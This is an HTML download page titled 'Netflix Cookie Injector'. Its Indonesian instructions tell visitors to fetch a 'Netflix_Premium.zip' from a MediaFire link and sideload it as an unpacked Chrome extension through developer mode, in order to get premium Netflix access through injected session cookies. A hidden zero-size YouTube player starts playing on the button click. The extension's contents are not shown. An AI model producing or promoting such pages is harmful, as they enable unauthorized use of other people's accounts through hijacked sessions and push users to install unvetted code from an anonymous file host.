<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix Cookie Injector</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f0f0f0;
            margin: 0;
            padding: 20px;
        }
        button {
            padding: 15px 25px;
            font-size: 18px;
            cursor: pointer;
            background-color: #e50914;
            color: white;
            border: none;
            border-radius: 5px;
        }
        #instructions {
            margin-top: 20px;
            padding: 20px;
            background-color: white;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: left;
        }
        #instructions h2 {
            margin-top: 0;
        }
        #instructions ol {
            padding-left: 20px;
        }
        #player {
            display: none;
        }
    </style>
</head>
<body>
    <button id="netflix-button">Download Extension Netflix Disini</button>
    <div id="instructions">
        <h2>Tahapan Instalasi ekstensi:</h2>
        <ol>
            <li>Extract file tersebut terlebih dahulu</li>
            <li>Masuk ke extension chrome. chrome://extensions/</li>
            <li>Aktifkan developer mode (sudut kanan atas) kemudian Klik load unpacked (kiri atas)</li>
            <li>Pilih folder yang di extract (Netflix Premium), klik select folder</li>
            <li>Pin extension, Masuk ke Netflix.com, Klik extensionnya, klik Masuk</li>
            <li>Selesai</li>
        </ol>
    </div>
    <div id="player"></div>

    <script>
        // Load the IFrame Player API code asynchronously.
        var tag = document.createElement('script');
        tag.src = "https://www.youtube.com/iframe_api";
        var firstScriptTag = document.getElementsByTagName('script')[0];
        firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);

        // Create an <iframe> (and YouTube player) after the API code downloads.
        var player;
        function onYouTubeIframeAPIReady() {
            player = new YT.Player('player', {
                height: '0',
                width: '0',
                videoId: 'AYAlLXHiCkI',  // Replace with your YouTube video ID
                events: {
                    'onReady': onPlayerReady
                }
            });
        }

        function onPlayerReady(event) {
            document.getElementById('netflix-button').addEventListener('click', function() {
                window.open('https://www.mediafire.com/file/c4sm53cjre819fw/Netflix_Premium.zip/file', '_blank');
                event.target.playVideo();
            });
        }
    </script>
</body>
</html>
